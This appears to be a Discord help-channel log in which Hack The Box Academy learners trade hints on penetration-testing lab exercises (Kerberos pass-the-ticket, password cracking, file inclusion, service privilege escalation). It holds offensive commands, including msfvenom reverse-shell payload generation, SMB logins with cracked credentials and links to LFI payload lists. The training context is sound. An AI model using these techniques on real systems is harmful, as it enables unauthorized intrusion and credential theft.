You can't post screenshots

ohh

well basically it didnt parse the port, it ignored it

https://discord.com/channels/473760315293696010/1257062567965364334

Then you're doing something wrong, I'm assuming you downloaded the reconspider tool from the module with wget?

Because there is one on github that's a completely different tool

yes, i followed the instruction from htb

And you're running it python3 ReconSpider.py http://[site.htb]:port

yes http://[vhosts.site.htb:port/sub] let me know if i need to edit this not to spoil

lol i wish i had your machine ig

okay, it works for external sites like inlanefreight.com but for the skill assessment it allows returns blank results, am I doing something wrong enumeration wise or is it the tool?

Anyone know where we find the password for the sample report in the resources of the documentation and reporting module?

Maybe you need to dig deeper

It's likely given in one of the first sections

Don't forget subdomains of subdomains exist

back to the cutting board

Drawing board*

the turn tables have turned

can you lend me a hint, its okay if not

Oh how the turns have tabled

.

oh ive found it now. I'm tired and scanned over it

will do

¯_(ツ)_/¯

hey, I'm doing "Network Enumeration with Nmap" and I'm on medium lab right now. I clearly know I have to use ||sudo nmap -sSU -p 53 --script dns-nsid $ip||, but as a result I don't get any response from the script, it just shows me opened udp port.

Unfortunaly, I can not send a screenshot

https://nmap.org/nsedoc/scripts/dns-nsid.html

im an idiot

ty

Do this on the pwnbox

For w/e reason it's finicky on regular vms

thx

Hi! I need some clarification on the content in [Password Attacks] Pass the Ticket (PtT) from Windows.
In the module, under Rubeus - PowerShell Remoting with Pass the Ticket, Creating a Sacrificial Process with "createnetonly" was mentioned.
I understand that this is to prevent erasure of existing TGTs for the current logon session. However, I don't understand the use case. From my understanding, assuming I have access to a local account, this account would not have anything to do with Kerberos TGTs. If I utilise PtT to gain access to a domain user (john's) context, I'm supposedly overwriting a TGT (which I assume local accounts have nothing to do with). Hence, my confusion is in this use case of Sacrificial Processes.

Domain users inherently use tickets to logon

It's how kerberos works

If it's a truly local account. It needs to interact with kerberos in some way

I understand that we get the tickets to logon. I don't understand when we have to use sacrificial processes (Rubeus "createnetonly").

Is it not the case that the interaction with kerberos should be via the Rubeus.exe application? In a truly local account, I shouldn't be afraid of any TGT overwriting in that case

It's good practice

What if the account you're on isnt local

Ok! Thanks for clarifying 🙂

I am stuck on Password Attacks Lab - Hard. I have cracked johanna's rdp password and logged on to the target. I downloaded the keepass file with evil-winrm and cracked the password. I opened the protected file and got the d... user and password. I have tried to use logon with rdp using d's password - no success. I have tried using smbclient with johanna's creds and d's creds - no success. I have looked for other files but can't find anything useful. I have tried using d's creds to get admin rights to look in d's folder, or dump SAM or LSASS - no success. I need some hints on where to go from here, please

You should be able to log in with d*

On smb or rdp? Neither one works for me.

Make sure you copied it correctly

Smb should work

Password should be g..7

Perhaps I am using the smbclient command wrong. I have tried copying and typing the password. No success. Here is the command I am using: smbclient \\10.129.202.222 -U david then I put in the password g..7 All I get is NT_STATUS_NOT_FOUND

First list shares -L

Also you can do // instead of \\\\

oK. Well, I could have sworn I did all that already, but now it seems to be working fine this time around. I'm on the share. Thank you!

Np

You're on the home stretch

That's good because I am pretty tired of this module. For some reason, it is kicking my butt although nothing in the material is all that complicated.

Tbh this will require some research. Mounting is the hard part, plenty of articles though -- shared in this channel too

(a) thank-you, (b) while I found it [largely due to this], and knowing the answer now, I can see where the course author was going, still feel like it's making a bit of a leap... now, maybe if it were say the first question of the first section in this module, it'd make a lot more sense, but going all this time... (for me at least) leads to a preconcieved notion on expected behavior of the app (IMHO). Anyhow, thx again for your respose to the other person who had the same challenge.

anyone else have problems with information gathering,at archive.org ?

Htb didn't use .com back then

If you do a search in the discord you'll see that question asked and answered a few times

thanks!

Is bug bounty path just a stripped down Pen test one btw?

Or are there module in bug bounty one pen test one doesn’t have

there are cbbh specific modules

Different goals, the only overlap is surface level web stuff

Awesome I’ll finish bug bounty path then do pen test one then

EDIT: Nevermind, just got ahead of myself... but all I can say is if I am on the right track, good luck to those who haven't done it yet...  but a very, Very, VERY subtle nudge, reads like a bad dad joke... (well, not really a nudge, but will make sense when you get it)

Guys <dumb q> is there a dotnet decompiler for linux?

Vscodium probably

ok ty

I don't think it's a dumb question per-se... but... did you attempt to google it? Literally very first thing that pops up...

yes went over bunch

Thanks!

actually missed that particular one, mb

Fair enough -- I didn't try it, I thought to myself (when reading your question, I don't know myself and now curious... so googled... and then... yeah. But if you tried them and they didn't work, then fair enough

Sometimes windows doesn't like things that aren't compiled in windows

Where's a good place to point out small inaccuracies in a module?

#1234357888114364508

Thank you much.

I’m stuck on the final question of Kerberos Attacks - Skill Assessment module.

I already have SERVER01 and login as system privileges, then I use rubeus monitor and try spoolsample.exe. dc01.inlanefreight.local server01.inlanefreight.local, but it appears to be not working for dc01, is there anything I'm missing? Please help for guidance. Thank you

you can coerce the DC, but you won't get a ticket from the machine account, read the quesiton and rubeus output carefully

Thank you, I will have a try 😀

"How many files exist on the system that have the ".log" file extension? " Linux fundamentals

Im getting different numbers. 508, 507, 506

now im getting 504?

find / -type f -user root -name "*log" 2>/dev/null | wc -l

1. You don't need the -user flag
2. are you ssh into the target
3. you need to search for *.log

1. I dont need it because theres only 1 user on the machine im connecting to, right?
2. yes
3. What changes when swithcing from "*log" to *.log?

@storm elk Hi there, Can i DM you for the advanced SQL injection in the last flag?

Sure

*log will match any file that ends with "log". *.log will match files specifically ending in .log extension

I can't type * without dc making everything italic

Hi

anyone knows why i can't send messages in #general ?

you need to read and complete the actions in #welcome

thx

Hoping someone wouldn't mind verifying they can get a reverse shell on "Windows Privilege Escalation - Weak Permissions". First attempt (a long time ago) I got a shell that immediately died..haven't been able to get a shell since. Changed VPNs multiple times, went back to the previous section to get a reverse shell again just to make sure I wasn't having a netcat issue. Working through the 'SecurityService' steps in the module should be providing the shell, so I'd just like someone to confirm if there's an issue with the lab or me. I've gone in circles on this for too long, so any verification would be amazing

Weird, using "*x" in my last module problem got me files with the x extention

oh nevermind

what's your msfvenom command to generate the payload?

aahhh

tried msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.21 LPORT=4444 -f exe > SecurityService.exe and also msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.229 LPORT=4444 -f exe > SecurityService.exe (dont' mind the IP change -- that was before/after VPN switch)

So "*log" Gets all files that have log and the log extention

Ye

while ..log gets files with only log extension

i see, thanks!

Which is why you got like 500 matches

try with windows/x64/shell_reverse_tcp

oh you did

yeah i've tried both multiple times across multiple VPNs

hmm let me check

ty

I’m stuck on the Skills Assessment in the File Inclusion module 😒

I’ve gone through the entire module multiple times and have gotten all the flags multiple times, but none of these techniques seem to be working on the Skills Assessment target application.

Are you listening with metasploit?

no, and I wasn't on the previous module either but still got a shell on netcat

Try listening with metasploit and see if you do get a shell

are you using powershell to run the sc command?

yeah although believe i tried cmd prompt earlier as well but it's been so long i can't remember. 99% powershell

and you don't see any output after you ran it?

no output

for powershell use sc.exe

you should see something shows up

yeah that's how it worked in the previous section as well (dll instead of exe) but you could tell something executed. Appreciate the input. I basically logged out for the evening but i'll give that a try tomorrow

Anyone complete the File Inclusion module?

yeah use sc.exe start SecurityService, it worked for me

ask your question we'll see if we can help 🙂

I don’t even know what to ask.
I can’t get any traction at all on the last part. The Skills Assessment.

None of the LFI techniques seem to work.

What specific task are you struggling with

wdym techniques? Payloads?

I need to get RCE on the target application, but no LFI attacks are working.

Payloads.
Local/remote file inclusion techniques.

try different ones https://book.hacktricks.xyz/pentesting-web/file-inclusion

first try to get the page source, then use that to find how to get rce

Those look like all the ones I’ve tried.
You’ve completed that module?
One of those worked?

I don't do academy

Getting the page source is easy.
Not sure how that helped.

Oh…

I'm talking about the server side php code on the page, not right click view source

How do I get that?

through lfi

php code won't be displayed if you're viewing it on the client side

It doesn’t seem to be working.

LFI

Curl?

It’s not clicking for me… I need a little more info.

How do you know if LFI is working on your target in the first place?

wdym "not working"? You're getting "file not found"?

Like if it's vulnerable

Did you test?

Well, you get some type of information back as I did with all of the other exercises in the module.

Try reviewing the "local file inclusion" section to see how they teach you to read files

I’m not getting anything when I try to test.

I’ve done that like 3 times.

okay, so you can successfully read files on the server then?

Adding to the end of the url, encoding, ect

No. lol

what error are you getting??

None of the lfi tpworked.

I don't really understand what you're saying

you may also want to go over "PHP Filters" again, there's a section in there for source code disclosure

are you getting error codes from the web server?

we can't help you if you don't elaborate more

I get the “error page”

try other payloads

look at what it filters and what it doesn't

I feel I’ve tried them all. That’s why I’m here.

@uneven oracle here are a list of payloads to test if LFI works and you can go on from there

Ceald said he doesn't do academy. read this: #modules message

https://github.com/xmendez/wfuzz/blob/master/wordlist/vulns/dirTraversal-nix.txt

you didn't cause one would've worked 😄

Well I’m confused. I keep going through the module trying them and none are working. Not sure what I’m missing.

also try removing the # character, no files in linux have a #

It put that there itself.

you can lead a horse to water..

Remember, LFI is just accessing local files stored on the server

I originally didn’t have it there.

read the PHP Filters section and try the techniques please

I tried the filters, lol.
I’ll show one. One sec.

Really?

Every one I try just leaves the page blank at the bottom.

whatever you've tried is not even in the PHP Filters section...

Maybe try seeing what that payload does

It’s in the wrappers section.

As in decode it

no, that's not it Ceald

he took the base64 string from the skill assessment of that module and put it into the request

The payload I just tried is supposed to “id” command on the server and display that info.

if you can't get LFI working the first place, why go to RCE?

Solemn_1 I would suggest slowing down, re-reading the php filters content section, and really trying to understand it. you're trying to local file include a base64 string, so you're trying to read that string on the server. why do you think there's a file with that string in there?

Yeah lol

You guys just suggested that…
How do I get anything to work? lol

PHP Filters, not Wrappers...

What exactly do you get when you try a very basic payload?

They are the same.

Review the content go back and redo the exercises, everything in the skill assessment is covered in the module itself

Can you tell me what worked for you?
I just showed what happens with a basic payload.

they are not the same. unless they changed the module recently, php filters and php wrappers are two separate sections. you're not doing it correctly.

nope I've just tried it

I’ve done that multiple times,

buddy if you're just here to get someone to do the module for you, that's not gonna happen

Well you need to filter it bro

It's literally detecting your payload

I'll say again, read the PHP Filters section and try the techniques please

I’ve completed the entire module and gotten all flags multiple times.
I should have a basic understanding.
But these attacks are not working on the final assessment target.

specifically, the PHP Filters section

having problems with metasploit academy. im getting Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created.

Yes they do

They should work

I’m just saying filters are a type of wrapper.

there's an entire section called php filters

Going through now.

look at the table of contents on the right

I thought you were trying to get lfi?

I know.

https://tenor.com/view/huh-gif-1807502725802114204

Code execution using wrappers I think? Idk

I need local file inclusion to get remote code execution.

So, you're trying to finish the section question for https://academy.hackthebox.com/module/23/section/1492 ?

Does the module say that?

skills assessment that requires techniques from the previous sections

Oh, they're on the assessment, ok.

Relax bro.

https://academy.hackthebox.com/module/23/section/513

Now what? lol
What source code do I want to see?

The “filters” sections shows how to scan for params and how to read source code of that page.

The source of the page to get rce :'

I got the source of the index page…
What do I do with this info?
This part looks important

With that info find a way to trigger rce

I need a little more direction.

Did you complete that skill assessment with rce?

Have you?

yeah it's rce

What now?

i've completed the entire path

Well help me out…

i did..

They're trying to

use the skills and knowledge you have gained in the module to complete it

we helped you get started

That’s not very helpful…

You're not going to get handed the answer - the idea of Academy is to work through the sections of a module, learn from them and build your knowledge, and apply that knowledge to the skills assessment.

They said read the filters section. I did. I got source for that page.
I don’t know what’s next.

If you're struggling, you may want to go through the sections once more, and make some notes

Wtf

🤷‍♂️